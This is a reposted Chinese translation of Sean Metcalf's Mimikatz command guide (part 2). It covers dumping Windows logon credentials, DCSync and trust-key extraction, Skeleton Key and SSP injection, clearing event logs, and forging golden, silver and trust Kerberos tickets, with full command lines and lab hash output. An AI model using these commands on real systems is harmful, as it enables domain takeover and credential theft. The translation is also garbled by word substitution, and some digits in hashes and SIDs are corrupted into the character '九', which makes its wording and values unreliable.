|
|
|
联系客服020-83701501

Mimikatz 非官方指南和命令参考_Part2

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
Mimikatz 非民间指南和命令参考_Part2

原文地址:https://adsecurity.org/?page_id=1821
原文作者:Sean Metcalf

译者注:
由于原文中,作者(Sean Metcalf)曾经光显分明的指出 “未经本文作者光显分明的书面准许,请勿复制搜聚在此页面的部门或扫数内容。”,因此为了分享此佳作,译者与作者(Sean Metcalf)在推上取得了分割,近似以后,作者准许我将此文完整翻译并分享给其它人。在此也谢谢 Sean Metcalf 大牛将有关 Mimikatz 的部门内容做了零碎的整顿并分享出来。如下是原文作者(Sean Metcalf)回复的截图,以作受权阐明:

p1

0x00 简介

Mimikatz 作为当下内网渗入渗出神器之一,看起来似乎很少有人真正关注它的部门听从(Sean Metcalf 在原文开首也暗示了这样的疑惑),在一些诸如 “十大黑客工具” 的文章中也看不到 Mimikatz 的影子。 Sean Metcalf 大牛将有关 Mimikatz 的相干技艺做了零碎的整顿,遂做粗糙翻译并作分享。译文未免有误,望各位看官及时赐正。此文是译文的第2扫数,次要论述了应用 Mimikatz 成立3大票证(黄金票证,白银票证,信任票证)的命令用法,以及 哈希传递(PTH),票证传递(PTT),密钥传递(PTK),缓存传递(PTC)的应用,在第3扫数中会搜聚大量罕用或不罕用的 Mimikatz 命令的详细用法。

0x01 实行 Mimikatz 的“另类思路”

Casey Smith (@subtee & blog) 曾经做了很多变乱,表白了应用轨范白名单不是万能的。 Casey 也想出了很多新的想法,以“大雅”的举措轨范来实行 Mimikatz 。

  • 在 RegSvcs or RegAsm 中实行 Mimikatz
  • 将 Mimikatz 打包&隐藏在一个图片文件里
  • 从 Github 中下载并实行 Mimikatz

0x02 最流行的 Mimikatz 命令

上面就引见一些最流行的 Mimikatz 命令及相干听从。

  • CRYPTO::Certificates – 列出/导出把柄
  • KERBEROS::Golden – 成立黄金票证/白银票证/信任票证
  • KERBEROS::List 211; 列出在用户的内存中部分用户的票证(TGT 和 TGS)。毋庸要非凡的权限,由于它仅示意以后用户的票证。与 “klist” 的听从相通。
  • KERBEROS::PTT 211; 票证传递。一般用于注入窃取或虚构的 Kerberos 票证(黄金票证/白银票证/信任票证)。
  • LSADUMP::DCSync 211; 向 DC 发动同步一个对象(获取帐户的暗码数据)的质询。无需在 DC 上实行代码。
  • LSADUMP::LSA – 向 LSA Server 质询检索 SAM/AD 的数据(畸形或未打补丁的情况下)。梗概从 DC 大约是一个 lsass.dmp 的转储文件中导出部分的 Active Directory 域把柄数据。同样也梗概获取指定帐户的把柄,如 krbtgt 帐户,应用 /name 参数,如:“/name:krbtgt”
  • LSADUMP::SAM 211; 获取 SysKey 来解密 SAM 的项目数据(从注册表大约 hive 中导出)。SAM 选项梗概毗邻到本地安全帐户设计器(SAM)数据库中并能转储本地帐户的把柄。梗概用来转储在 Windows 计算机上的部分的本地凭据。
  • LSADUMP::Trust 211; 向 LSA Server 质询来获守信任的认证新闻(畸形或未打补丁的情况下)。为部分相干的受信的域或林转储信任密钥(暗码)。
  • MISC::AddSid – 将用户帐户减少到 SID 汗青记载。第一个值是目标帐户,第2值是帐户/组名(梗概是多个)(或 SID )。
  • MISC::MemSSP – 注入恶意的 Wndows SSP 来记载本地身份考证凭据。
  • MISC::Skeleton – 在 DC 中注入万能钥匙(Skeleton Key) 到 LSASS 历程中。这使得部分用户所应用的万能钥匙修补 DC 应用 “主暗码” (别名万能钥匙)以及他们自己一般应用的暗码停止身份考证。
  • PRIVILEGE::Debug – 取得 Debug 权限(很多 Mimikatz 命令必要 Debug 权限或本地 SYSTEM 权限)。
  • SEKURLSA::Ekeys – 列出 Kerberos 密钥
  • SEKURLSA::Kerberos – 列出部分已颠末认证的用户的 Kerberos 把柄(包含处事帐户和计算机帐户)
  • SEKURLSA::Krbtgt – 获取域中 Kerberos 处事帐户(KRBTGT)的暗码数据
  • SEKURLSA::LogonPasswords – 列出部分可用的提供者的凭据。这个命令一般会示意最近登录过的用户和最近登录过的计算机的把柄。
  • SEKURLSA::Pth – Hash 传递 和 Key 传递(注:Over-Pass-the-Hash 的实际过程就是传递了相干的 Key(s))
  • SEKURLSA::Tickets – 列出最近部分曾经过身份考证的用户的可用的 Kerberos 票证,包含应用用户帐户的上下文运转的处事和本地计算机在 AD 中的计算机帐户。与 kerberos::list 分歧的是 sekurlsa 应用内存读取的举措轨范,它不会受到密钥导出的制约。
  • TOKEN::List – 列出零碎中的部分令牌
  • TOKEN::Elevate – 假充令牌。用于晋职权限至 SYSTEM 权限(默认情况下)大约是创举计算机中的域设计员的令牌。
  • TOKEN::Elevate /domainadmin – 假充一个拥有域设计员把柄的令牌。

0x03 ADSecurity 中与 Mimikatz 相干的文章

部分提及到 Mimikatz 的文章:ADSecurity.org Mimikatz Posts

  • Mimikatz and Active Directory Kerberos Attacks
  • Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync
  • How Attackers Use Kerberos Silver Tickets to Exploit Systems
  • Mimikatz DCSync Usage, Exploitation, and Detection
  • Sneaky Active Directory Persistence #12: Malicious Security Support Provider (SSP)
  • Sneaky Active Directory Persistence #11: Directory Service Restore Mode (DSRM)
  • Kerberos Golden Tickets are Now More Golden
  • It’s All About Trust – Forging Kerberos Trust Tickets to Spoof Access across Active Directory Trusts
  • Detecting Mimikatz Use

0x04 Mimikatz 命令指南

Mimikatz 梗概在交互内容中运转,只需运转 “Mimikatz.exe” 便可或传递命令并退出(比喻:217;Mimikatz “Kerberos::list” exit216;)。Invoke-Mimikatz 没有交互内容。

Mimikatz 梗概在命令行中传递多个命令,这在应用 Invoke-Mimikatz 大约是在脚本文件中应用 Mimikatz 时极其无效。

追加的 “exit” 是 Mimikatz 实行的开首一个命令,这大约使 Mimikatz 主动退出。

Default
12345678九1011121314151617181九2021222324252627282九3031323334353637383九40 PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Nov 13 2015 00:44:32) .## ^ ##. ## / \ ##  /* * * ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo) '#####'                                     with 17 modules * * */ mimikatz(commandline) # privilege::debug Privilege '20' OK mimikatz(commandline) # sekurlsa::logonpasswords Authentication Id : 0 ; 646260 (00000000:000九dc74) Session           : RemoteInteractive from 2 User Name         : adsadministrator Domain            : ADSECLAB Logon Server      : ADSDC03 Logon Time        : 11/27/2015 11:41:27 AM SID               : S-1-5-21-1581655573-3九23512380-6九66478九4-500 msv : [00000003] Primary * Username : ADSAdministrator * Domain   : ADSECLAB * NTLM     : 5164b7a0fda365d5673九954bbbc23835 * SHA1     : f8db2九7cb2ae403f8九15675cebe7九643d0d3b0九f [00010000] CredentialKeys * NTLM     : 5164b7a0fda365d5673九954bbbc23835 * SHA1     : f8db2九7cb2ae403f8九15675cebe7九643d0d3b0九f tspkg : wdigest : * Username : ADSAdministrator * Domain   : ADSECLAB * Password : (null) kerberos : * Username : adsadministrator * Domain   : LAB.ADSECURITY.ORG * Password : (null) ssp :   KO

交互内容提供了一个命令梗概输入并实时实行的 “Mimikatz 控制台”:

0x05 Mimikatz 命令参考

Mimikatz 的模块下列:

  • CRYPTO
    • CRYPTO::Certificates
  • DPAPI
  • EVENT
  • KERBEROS
    • Golden Tickets
    • Silver Tickets
    • Trust Tickets
    • KERBEROS::PTT
  • LSADUMP
    • DCSync
    • LSADUMP::LSA
    • LSADUMP::SAM
    • LSADUMP::Trust
  • MISC
  • MINESWEEPER
  • NET
  • PRIVILEGE
    • PRIVILEGE::Debug
  • PROCESS
  • SERVICE
  • SEKURLSA
    • SEKURLSA::Kerberos
    • SEKURLSA::Krbtgt
    • SEKURLSA::LogonPasswords
    • SEKURLSA::Pth
  • STANDARD
  • TOKEN
    • TOKEN::Elevate
    • TOKEN::Elevate /domainadmin
  • TS
  • VAULT

注:任何被标记为“实行”的项目,都理当仅在测试情况中应用。

加密模块(CRYPTO)

Mimikatz 的 CRYPTO 模块提供与 Windows 加密听从(CryptoAPI)停止对接的低级听从。

榜样的用法的是用于导出未标记为“可导出”的证书。

CRYPTO::CAPI – (实行)是对 CryptoAPI 层的补丁,便于导出把柄数据。

p2

CRYPTO::Certificates 211; 列出/导出 证书

关于应用 Mimikatz 导出证书,Carlos Perez (别名DarkOperator) 颁发过一篇很棒的文章。

这个命令梗概列出证书以及证书中密钥的属性。它同样也梗概导出证书。一般情况下,必要先实行 “privilege::debug”

  • /systemstore 211; 可选的参数 211; 此参数被用于指定零碎证书存储库典范(默认为: CERT_SYSTEM_STORE_CURRENT_USER)
  • /store – 可选的参数 211; 此参数必须被用于 列出/导出证书(默认为:My)- 应用 “crypto::stores” 列出部分内容
  • /export 211; 可选的参数 211; 将部分的证书导出到文件中(DER 为证书的私有扫数,PFX 为证书的私有扫数 – 暗码应用 “mimikatz” 停止了尊崇)

Benjamin 对 CRYPTO:Certificates 的讲明:

  • crypto::stores 给出了可用的 systemstore 列表,并输入了 store 参数可用的列表。
  • 不可导出的密钥(常见舛错为:KO 211; ERROR kuhl_m_crypto_exportCert ; Export / CreateFile (0x800九000b))梗概应用 crypto::capi 大约 crypto::cng 停止导出。
  • 虽然已有 crypto::capi 或 crypto::cng 补丁,可是你必须在文件零碎上拥有准确的 ACL 去拜访私钥(如:UAC)。
  • 有些智能卡加密提供者会告诉“腐化导出私钥”(实际上并不没有腐化导出)。
CRYPTO::CNG 211; (实行)对 CNG 处事停止补丁,便于导出(补丁 “KeyIso” 处事)
CRYPTO::Hash 211; 对一个暗码停止哈希操纵(梗概应用可选的用户名)
CRYPTO::Keys 211; 列出/导出密钥容器
CRYPTO::Providers 211; 列出加密提供者

p3

CRYPTO::Stores 211; 列出加密存储库
  • /systemstore 211; 可选的参数 211; 此参数被用于指定零碎证书存储库典范(默认为: CERT_SYSTEM_STORE_CURRENT_USER)

Store 选项:

Default
12345678 CERT_SYSTEM_STORE_CURRENT_USER or CURRENT_USERCERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY or USER_GROUP_POLICYCERT_SYSTEM_STORE_LOCAL_MACHINE or LOCAL_MACHINECERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY or LOCAL_MACHINE_GROUP_POLICYCERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE or LOCAL_MACHINE_ENTERPRISECERT_SYSTEM_STORE_CURRENT_SERVICE or CURRENT_SERVICECERT_SYSTEM_STORE_USERS or USERSCERT_SYSTEM_STORE_SERVICES or SERVICES

p4

DPAPI 模块

DPAPI::Blob – 应用 API 或 Masterkey 打消 DPAPI 2进制大对象的尊崇
DPAPI:Cache
DPAPI::CAPI – CAPI 密钥测试
DPAPI::CNG – CNG 密钥测试
DPAPI::Cred – CRE 测试
DPAPI::CredHist – 配置一个 Credhist 文件
DPAPI::MasterKey – 配置 Masterkey 文件或打消尊崇(请托于密钥)
DPAPI::Protect – 应用 DPAPI 尊崇数据
DPAPI::Vault – VAULT 测试

EVENT 模块

EVENT::Clear – 清空变乱日志

p5

EVENT:::Drop –(实行)对变乱处事停止补丁,防止新的变乱产生

p6

KERBEROS 模块

Mimikatz 的 KERBEROS 模块用于与微软民间的 Kerberos API 停止对接。此模块中的命令毋庸要非凡的权限。

  • KERBEROS::Clist – 列出 MIT/Heimdall 缓存中的票证
  • KERBEROS::Golden – 成立 黄金票证/白银票证/信任票证

该命令提供的听从必要依照检索到的暗码的哈希典范实行。

Type Requirement Scope
Golden KRBTGT hash Domain/Forest
Silver Service hash Service
Trust Trust hash Domain/Forest -> Domain/Forest
(基于帐户的拜访)

黄金票证(Golden Ticket)

黄金票证是一个应用 KRBTGT 帐户的 NTLM 暗码哈希来加密和署名的 TGT 。

黄金票证(简称:GT)梗概用于成立任安在域中的用户(实际存在或不存在的均可)假意为任安在域中的组(提供简直不受制约的权限)的成员以及在域中 的任何老本。由于黄金票证是一种身份考证票证(TGT 下列所述),所以其范围是 TGT 扫数域(以及应用了 SID 汗青的 AD 林),另有一个起因是 TGT 梗概用来获取用于拜访老本的处事票据(TGS)。黄金票证(TGT)搜聚了用户组成员新闻(PAC),这些新闻应用了域的 Kerberos 处事帐户(KRBTGT)停止加密,署名并且只能由 KRBTGT 帐户技巧翻开并读取这些新闻。
总之,一旦攻打者大约拜访 KRBTGT 帐户的暗码哈希,他们即梗概成立黄金票证(TGT)用于在任何时辰拜访在 AD 中的任何东西。

Mimikatz 黄金票证命令参考

成立一个黄金票证的 Mimikatz 命令为 “kerberos::golden”

  • /domain – 指定彻底合格的域名称,如: “lab.adsecurity.org”。
  • /sid – 指定域的 SID。 如: “S-1-5-21-147364341九-774九5408九-222232九127”.
  • /sids – 指定你想要应用票证去拐骗其它在 AD 林中的帐户或组的 SID。这个是根域中,企业设计员组(Enterprise Admins group)的 SID “S-1-5-21-147364341九-774九5408九-587232九127-51九”。 此参数将会减少所提供的 SID 到 SID History 参数。
  • /user – 指定假充的用户名。
  • /groups (可选的) – 指定用户所属组的 RID (第一个是次要的组)。减少用户或计算机帐户的 RID,以取得近似的拜访权限。默认组: 513,512,520,518,51九 是众所周知的 Administrator 组的 RID(上面会列出)。
  • /krbtgt – 获取域的 KDC 处事帐户(KRBTGT)的 NTLM 暗码哈希。用于对 TGT 停止加密和署名。
  • /ticket (可选的) – 提供生涯生涯黄金票证文件的阶梯和名称大约应用 /ptt 参数将黄金票证注入到内存中。
  • /ptt – 是 /ticket 参数的承办参数– 应用该参数梗概立行将虚构的票证注入到内存中。
  • /id (可选的) – 用户的 RID。 Mimikatz 中默认的值为 500 (默认的 Administrator 帐户的 RID)。
  • /startoffset (optional) – 当票证可历时指定肇始偏移(在应用此选项时一般指定为 -10 或 0 )。 Mimikatz 中默认的值为 0。
  • /endin (可选的) – 票证的生命周期。 Mimikatz 中默认的值为 10 年 (5,262,480 分钟)。 Active Directory 中的 Kerberos 战略设置的值是 10 小时 (600 分钟)。
  • /renewmax (可选的) – 应用了续约的票证的最大生命周期。 Mimikatz 中默认的值为 10 年 (5,262,480 分钟)。 Active Directory 中的 Kerberos 战略设置的值是 7 天 (10,080 分钟)。
  • /sids (可选的) – 指定在 AD 林中的企业设计员组(Enterprise Admins group)([ADRootDomainSID]-51九) 中的 SID 以便拐骗在 AD 林中的企业设计员权限 (在 AD 林中的每个域中的 AD 设计员)。
  • /aes128 – 指定 AES128 的 key
  • /aes256 – 指定 AES256 的 key

黄金票证默认的组

  • Domain Users 组的 SID: S-1-5-21-513
  • Domain Admins 组的 SID: S-1-5-21-512
  • Schema Admins 组的 SID: S-1-5-21-518
  • Enterprise Admins 组的 SID: S-1-5-21-51九 (只需在林的根域中成立了虚构的票证并应用 /sids 参数指定 AD 林中设计员权限的情况下才会无效)
  • Group Policy Creator Owners 组的 SID: S-1-5-21-520

Default
1 kerberos::golden /admin:ADMIINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt

命令示例:

Default
1 .\mimikatz “kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:九9九9 /sid:S-1-5-21-135380161-1021九1138-581311202 /krbtgt:13026055d01f235d67634e10九da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt” exit

p7

黄金票证参考

应用“ SID 汗青”的黄金票证

更新于 1/5/2016:

在 2015 年一月初,我分享过检测虚构的 Kerberos 票证并且随后在 BSides Charm 2015 中提到过此新闻。不久后,Mimikatz 停止了更新,应用了一个设置为静态值的 domain 字段,此字段一般搜聚字符串“eo.oe”。更新于 1/5/2016 的 Mimikatz 中,虚构的 Kerberos 票证将再也不搜聚一个不规定的域,由于 Kerberos 票证的域组件中装置了 NetBIOS 域名称。

上面是应用 diff 列出了 Mimikatz 代码的分歧之处:

p8

更多关于检测虚构的 Kerberos 票证(黄金票证,白银票证,等等)的分歧之处,请看这里。

白银票证(Silver Ticket)

白银票证(Silver Ticket)是一个 TGS (在格式上相似于 TGT),应用了目标的处事帐户(颠末 SPN 映照标识)的 NTLM 暗码哈希做加密,署名。
成立一个白银票证的 Mimikatz 命令为 “kerberos::golden”

Mimikatz 白银票证命令参考

  • /domain – 指定彻底合格的域名称,如: “lab.adsecurity.org”。
  • /sid – 指定域的 SID。 如: “S-1-5-21-147364341九-774九5408九-222232九127”.
  • /sids – 指定你想要应用票证去拐骗其它在 AD 林中的帐户或组的 SID。这个是根域中,企业设计员组(Enterprise Admins group)的 SID “S-1-5-21-147364341九-774九5408九-587232九127-51九”。 此参数将会减少所提供的 SID 到 SID History 参数。
  • /user – 指定假充的用户名。
  • /groups (可选的) – 指定用户所属组的 RID (第一个是次要的组)。减少用户或计算机帐户的 RID,以取得近似的拜访权限。默认组: 513,512,520,518,51九 是众所周知的 Administrator 组的 RID(上面会列出)。
  • /krbtgt – 获取域的 KDC 处事帐户(KRBTGT)的 NTLM 暗码哈希。用于对 TGT 停止加密和署名。
  • /ticket (可选的) – 提供生涯生涯虚构的票证文件的阶梯和名称大约应用 /ptt 参数将黄金票证注入到内存中。
  • /ptt – 是 /ticket 参数的承办参数– 应用该参数梗概立行将虚构的票证注入到内存中。
  • /id (可选的) – 用户的 RID。 Mimikatz 中默认的值为 500 (默认的 Administrator 帐户的 RID)。
  • /startoffset (optional) – 当票证可历时指定肇始偏移(在应用此选项时一般指定为 -10 或 0 )。 Mimikatz 中默认的值为 0。
  • /endin (可选的) – 票证的生命周期。 Mimikatz 中默认的值为 10 年 (5,262,480 分钟)。 Active Directory 中的 Kerberos 战略设置的值是 10 小时 (600 分钟)。
  • /renewmax (可选的) – 应用了续约的票证的最大生命周期。 Mimikatz 中默认的值为 10 年 (5,262,480 分钟)。 Active Directory 中的 Kerberos 战略设置的值是 7 天 (10,080 分钟)。
  • /sids (可选的) – 指定在 AD 林中的企业设计员组(Enterprise Admins group)([ADRootDomainSID]-51九) 中的 SID 以便拐骗在 AD 林中的企业设计员权限 (在 AD 林中的每个域中的 AD 设计员)。
  • /aes128 – 指定 AES128 的 key
  • /aes256 – 指定 AES256 的 key

白银票证必须指定的参数

  • /target – 指定目标处事器的 FQDN。
  • /service – 运转在目标处事器上的 kerberos 处事。这一个处同族儿体名称类或典范,比喻 cifs, http, mssql。
  • /rc4 – 该处事的 NTLM 哈希 (计算机帐户 or 用户帐户)

白银票证默认的组

  • Domain Users 组的 SID: S-1-5-21-513
  • Domain Admins 组的 SID: S-1-5-21-512
  • Schema Admins 组的 SID: S-1-5-21-518
  • Enterprise Admins 组的 SID: S-1-5-21-51九 (只需在林的根域中成立了虚构的票证并应用 /sids 参数指定 AD 林中设计员权限的情况下才会无效)
  • Group Policy Creator Owners 组的 SID: S-1-5-21-520

应用 Mimikatz 成立白银票证(Silver Ticket)示例

上面是为 adsmswin2k8r2.lab.adsecurity.org 上的 CIFS 处事成立一个白银票证的 Mimikatz 命令。为了确保白银票证大约腐化成立,必要先找到 adsmswin2k8r2.lab.adsecurity.org 中的 AD 计算机帐户的暗码哈希,你梗概从一个 AD 域中导出,也梗概在本地零碎中间接运转 Mimikatz (Mimikatz “privilege::debug” “sekurlsa::logonpasswords” exit)。NTLM 暗码哈希被用于 /rc4 参数,处事 SPN 典范同样必要应用 /service 参数指定。开首,目标计算机的彻底合格域名名称(FQDN)必要在 /target 参数中指定。不要忘掉在 /sid 参数中指定域的 SID 。

mimikatz “kerberos::golden /admin:LukeSkywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-147364341九-774九5408九-222232九127 /target:adsmswin2k8r2.lab.adsecurity.org /rc4:d7e2b80507ea074ad5九f152a1ba20458 /service:cifs /ptt” exit

p9

更新于 1/5/2016:

在 2015 年一月初,我分享过检测虚构的 Kerberos 票证并且随后在 BSides Charm 2015 中提到过此新闻。不久后,Mimikatz 停止了更新,应用了一个设置为静态值的 domain 字段,此字段一般搜聚字符串“eo.oe”。更新于 1/5/2016 的 Mimikatz 中,虚构的 Kerberos 票证将再也不搜聚一个不规定的域,由于 Kerberos 票证的域组件中装置了 NetBIOS 域名称。

上面是应用 diff 列出了 Mimikatz 代码的分歧之处:

p10

更多关于检测虚构的 Kerberos 票证(黄金票证,白银票证,等等)的分歧之处,请看这里。

信任票证(Trust Ticket)

一旦 Active Directory 的信任暗码哈希必此后 (Mimikatz “privilege::debug” “lsadump::trust /patch” exit),即梗概生成一个信任票证(Trust Ticket)。关于信任票证(Trust Ticket)劈面的更多细节,请看这里

虚构外部的 AD 林信任票证

在这个例子中,必要应用两个额定的工具,由 Benjamin Delpy 编写的 AskTGS 和 Kirbikator。

第一步 导出信任暗码(或信任密钥)

以后应用的 Mimikatz 版本梗概提存入信任密钥(或暗码)。

(Mimikatz “privilege::debug” “lsadump::trust /patch” exit)

p11

第2步 应用 Mimikatz 成立虚构的信任票证(跨域 TGT)

虚构信任票证阐理解打听票证的持有人是 AD 林中的企业设计员(Enterprise Admin)。这使得从一个子域到父域的拜访会失去彻底的设计权限。请把稳,此帐户没有存在于任何地方,由于它无效的应用黄金票证超过了信任域。
成立一个信任票证的 Mimikatz 命令为 “kerberos::golden”

Mimikatz 信任票证命令参考

  • /domain – 指定彻底合格的域名称,如: “lab.adsecurity.org”。
  • /sid – 指定域的 SID。 如: “S-1-5-21-147364341九-774九5408九-222232九127”.
  • /sids – 指定你想要应用票证去拐骗其它在 AD 林中的帐户或组的 SID。这个是根域中,企业设计员组(Enterprise Admins group)的 SID “S-1-5-21-147364341九-774九5408九-587232九127-51九”。 此参数将会减少所提供的 SID 到 SID History 参数。
  • /user – 指定假充的用户名。
  • /groups (可选的) – 指定用户所属组的 RID (第一个是次要的组)。减少用户或计算机帐户的 RID,以取得近似的拜访权限。默认组: 513,512,520,518,51九 是众所周知的 Administrator 组的 RID(上面会列出)。
  • /krbtgt – 获取域的 KDC 处事帐户(KRBTGT)的 NTLM 暗码哈希。用于对 TGT 停止加密和署名。
  • /ticket (可选的) – 提供生涯生涯虚构的票证文件的阶梯和名称大约应用 /ptt 参数将黄金票证注入到内存中。
  • /ptt – 是 /ticket 参数的承办参数– 应用该参数梗概立行将虚构的票证注入到内存中。
  • /id (可选的) – 用户的 RID。 Mimikatz 中默认的值为 500 (默认的 Administrator 帐户的 RID)。
  • /startoffset (optional) – 当票证可历时指定肇始偏移(在应用此选项时一般指定为 -10 或 0 )。 Mimikatz 中默认的值为 0。
  • /endin (可选的) – 票证的生命周期。 Mimikatz 中默认的值为 10 年 (5,262,480 分钟)。 Active Directory 中的 Kerberos 战略设置的值是 10 小时 (600 分钟)。
  • /renewmax (可选的) – 应用了续约的票证的最大生命周期。 Mimikatz 中默认的值为 10 年 (5,262,480 分钟)。 Active Directory 中的 Kerberos 战略设置的值是 7 天 (10,080 分钟)。
  • /sids (可选的) – 指定在 AD 林中的企业设计员组(Enterprise Admins group)([ADRootDomainSID]-51九) 中的 SID 以便拐骗在 AD 林中的企业设计员权限 (在 AD 林中的每个域中的 AD 设计员)。
  • /aes128 – 指定 AES128 的 key
  • /aes256 – 指定 AES256 的 key

信任票证必须指定的参数

  • /target – 指定目标处事器的 FQDN。
  • /service – 运转在目标处事器上的 kerberos 处事。这一个处同族儿体名称类或典范,比喻 cifs, http, mssql。
  • /rc4 – 该处事的 NTLM 哈希 (计算机帐户 or 用户帐户)
  • /ticket – 提供生涯生涯虚构的票证文件的阶梯和名称大约应用 /ptt 参数将黄金票证注入到内存中。

信任票证默认的组

  • Domain Users 组的 SID: S-1-5-21-513
  • Domain Admins 组的 SID: S-1-5-21-512
  • Schema Admins 组的 SID: S-1-5-21-518
  • Enterprise Admins 组的 SID: S-1-5-21-51九 (只需在林的根域中成立了虚构的票证并应用 /sids 参数指定 AD 林中设计员权限的情况下才会无效)
  • Group Policy Creator Owners 组的 SID: S-1-5-21-520

Default
1 Mimikatz “Kerberos::golden /domain:child.lab.adsecurity.org /sid:S-1-5-21-36770786九8-7246九0114-1九72670770 /sids:S-1-5-21-1581655573-3九23512380-6九66478九4-51九 /rc4:4九ed1653275f78846ff06de1a02386fd /user:DarthVader /service:krbtgt /target:lab.adsecurity.org /ticket:c:\temp\tickets\EA-ADSECLABCHILD.kirbi” exit

第3步 应用第2步中成立的信任票证文件在目标域中为针对性的处事获取 TGS 。生涯生涯 TGS 到一个文件中

在这个例子中,针对 CIFS 处事(实际上它梗概针对任那里那边事)所产生的后果是 TGS 提供给了 EA 拜访父(根)域中的域控制器的权限。

Default
1 Asktgs c:\temp\tickets\EA-ADSECLABCHILD.kirbi CIFS/ADSDC02.lab.adsecurity.org

p12

第四步 应用第3步中成立的 TGS 文件并应用曾经拐骗到手的权限拜访目标处事

Kirbikator lsa c:\temp\tickets\CIFS.ADSDC02.lab.adsecurity.org.kirbi

p13

  • KERBEROS::Hash – 将暗码哈希为密钥
  • KERBEROS::List – 列出在用户内存中的部分用户的票证(TGS 和 TGT)。没有指定必须的权限,由于它只是示意了以后用户的票证。与 “klist” 的听从相通。
  • /export – 将用户的票证导出到文件中。

应用SEKURLSA::TICKETS 转储地址已在零碎中考证过的用户的 Kerberos 票证。

请把稳,在有些情况下,用户的把柄将不会被导出。这时辰必要运转 SEKURLSA::Tickets /export(必要有适合的权限)。

p14

KERBEROS::PTC – 缓存传递(NT6)
*Nix 操纵零碎,如 Mac OS, Linux,BSD, Unix,等等会将 Kerberos 把柄停止缓存。这些曾经被缓存的文件颠末应用 Mimikatz 梗概被复制以及传递。同样对将 Kerberos 票证注入到缓存文件中也颇无效。

一个很好的例子是在应用 PyKEK 应用 MS14-068 漏洞时所应用的 Mimikatz 的 kerberos::ptc 命令。PyKEK 生成了一个缓存文件,应用 Mimikatz 的 kerberos::ptc 命令梗概注入操纵。

p15

KERBEROS::PTT – 票证传递

在找到 Kerberos 票证以后,它梗概被复制到其它零碎上,并且梗概传递到以后会话中无效的模拟一次登录且无需与域控制器有任何通信。未指定所需的权限。

相似于SEKURLSA::PTH (Pass-The-Hash) 哈希传递

  • /filename – 指定票证的文件名称(梗概是多个)
  • /diretory – 指定部分将被注入的 .kirbi 文件的文件夹阶梯

p16

KERBEROS::Purge – 废弃部分的 Kerberos 票证

听从相似于 “klist purge” 。在传递票证(PTC,PTT,等)前运转此命令,并且确保应用了准确的用户上下文。

p17

KERBEROS::TGT – 获取以后用户的 TGT

p18

【via@Her0in-drops】本文系乌云民间受权转载,未经受权请勿转载本文。

数安新闻+更多

证书相关+更多